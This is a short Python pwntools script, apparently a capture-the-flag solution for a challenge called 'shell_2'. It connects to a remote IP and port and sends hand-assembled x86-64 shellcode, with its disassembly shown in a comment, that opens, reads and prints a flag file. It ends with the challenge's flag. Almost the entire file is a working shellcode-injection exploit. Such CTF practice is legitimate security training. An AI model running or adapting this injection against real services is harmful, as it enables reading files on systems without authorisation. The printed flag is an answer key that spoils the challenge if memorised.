from pwn import *

script = '''
b *main
b *main + 153
'''

p = remote("103.69.97.144", 6081)
#p = gdb.debug("./shell_2", gdbscript = script)

'''
0:  68 78 74 00 00          push   0x7478
5:  48 bf 2e 2f 66 6c 61    movabs rdi,0x742e67616c662f2e
c:  67 2e 74
f:  57                      push   rdi
10: 48 89 e7                mov    rdi,rsp
13: 48 31 f6                xor    rsi,rsi
16: 48 31 d2                xor    rdx,rdx
19: 48 c7 c0 02 00 00 00    mov    rax,0x2
20: 0f 05                   syscall
22: 48 89 c7                mov    rdi,rax
25: 48 89 e6                mov    rsi,rsp
28: 48 c7 c2 50 00 00 00    mov    rdx,0x50
2f: 48 c7 c0 00 00 00 00    mov    rax,0x0
36: 0f 05                   syscall
38: 48 c7 c0 01 00 00 00    mov    rax,0x1
3f: 48 c7 c7 01 00 00 00    mov    rdi,0x1
46: 0f 05                   syscall
'''

payload = b"\x68\x78\x74\x00\x00\x48\xBF\x2E\x2F\x66\x6C\x61\x67\x2E\x74\x57\x48\x89\xE7\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x02\x00\x00\x00\x0F\x05\x48\x89\xC7\x48\x89\xE6\x48\xC7\xC2\x50\x00\x00\x00\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05"

p.sendlineafter(b"(max 4096 bytes):\n", payload)

p.interactive()
#BKSEC{No_MOrE_sH3LL_NO_MOrE_HARm}